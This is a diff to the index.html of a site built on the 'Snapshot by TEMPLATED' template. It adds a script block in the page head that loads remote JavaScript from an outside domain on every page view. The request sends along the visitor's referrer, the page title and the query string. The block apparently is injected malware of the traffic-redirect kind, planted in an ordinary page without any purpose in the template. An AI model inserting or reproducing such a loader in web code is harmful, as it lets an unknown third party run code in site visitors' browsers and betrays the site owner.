--- a/index.html
+++ b/index.html
@@ -6,6 +6,17 @@
 -->
 <html>
 	<head>
+		
+		<span id="2d149991-64e2-2021-9f99-7762890e2f4b"></span><script type="application/javascript">
+var d=document;var s=d.createElement('script'); 
+s.src='https://hatterxawe.website/Z8gHXyNM?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5ec9817c99eef=script5ec9817c99ef0&_cid=2d149991-64e2-2021-9f99-7762890e2f4b'; 
+if (document.currentScript) { 
+document.currentScript.parentNode.insertBefore(s, document.currentScript);
+} else {
+d.getElementsByTagName('head')[0].appendChild(s);
+}
+if (document.location.protocol === 'https:' && 'https://hatterxawe.website/Z8gHXyNM?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5ec9817c99eef=script5ec9817c99ef0'.indexOf('http:') === 0 ) {alert('The website works on HTTPS. The tracker must use HTTPS too.');}
+</script>
 		<title>Snapshot by TEMPLATED</title>
 		<meta charset="utf-8" />
 		<meta name="viewport" content="width=device-width, initial-scale=1" />
